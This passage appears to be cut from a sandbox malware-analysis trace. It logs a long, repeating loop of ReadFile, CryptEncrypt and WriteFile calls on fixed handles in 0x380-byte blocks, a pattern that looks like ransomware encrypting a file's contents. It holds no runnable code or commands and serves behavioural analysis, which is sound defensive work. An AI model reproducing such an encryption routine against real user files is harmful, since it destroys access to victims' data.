1 [0262.119] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.119] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.119] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.119] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.119] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.119] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.119] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.119] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.120] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.120] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.120] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.120] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.120] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.120] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.120] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.120] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.120] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.120] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.120] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.120] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.120] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.121] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.121] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.121] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.121] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.121] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.121] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.121] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.121] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.121] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.122] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.122] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.122] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.122] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.122] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.122] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.122] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.122] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.122] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.122] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.122] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.122] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.122] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.122] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.123] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.123] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.123] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.123] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.123] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.123] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.123] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.123] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.123] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.123] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.123] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.123] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.124] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.124] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.124] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.124] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.124] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.124] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.124] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.124] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.124] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.124] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.124] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.124] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.124] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.125] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.125] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.125] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.125] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.125] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.125] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.125] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.125] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.125] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.125] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.125] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.125] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.125] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.125] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.126] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.126] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.126] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.126] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.126] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.126] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.126] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.126] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.126] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.126] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.126] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.126] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.126] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.127] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.127] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.127] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.127] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.127] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.127] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.127] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.127] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: 